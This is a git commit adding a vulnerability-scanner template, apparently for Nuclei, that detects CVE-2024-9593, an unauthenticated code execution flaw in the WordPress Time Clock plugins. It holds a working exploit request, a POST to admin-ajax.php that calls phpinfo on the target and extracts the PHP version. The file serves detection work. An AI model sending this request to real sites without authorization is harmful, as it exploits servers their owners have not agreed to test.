Merge pull request #11084 from Kazgangap/CVE-2024-9593

add CVE-2024-9593
2024-10-28 13:20:46 +05:30 · 2024-10-28 13:20:46 +05:30 · 813009e857
parent d8959668cc 6113f80e5a
commit 813009e857
1 changed files with 71 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-9593.yaml
+++ b/http/cves/2024/CVE-2024-9593.yaml
@ -0,0 +1,71 @@
+id: CVE-2024-9593
+
+info:
+  name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution
+  author: s4e-io
+  severity: high
+  description: |
+    The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-9593
+    - https://github.com/RandomRobbieBF/CVE-2024-9593
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cve-id: CVE-2024-9593
+    cwe-id: CWE-94
+    epss-score: 0.00052
+    epss-percentile: 0.21567
+  metadata:
+    max-request: 2
+    verified: true
+    vendor: scott_paterson
+    product: time-clock & time-clock-pro
+    framework: wordpress
+    fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
+  tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "/wp-content/plugins/time-clock")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        function=phpinfo
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '>PHP Version <\/td><td class="v">([0-9.]+)'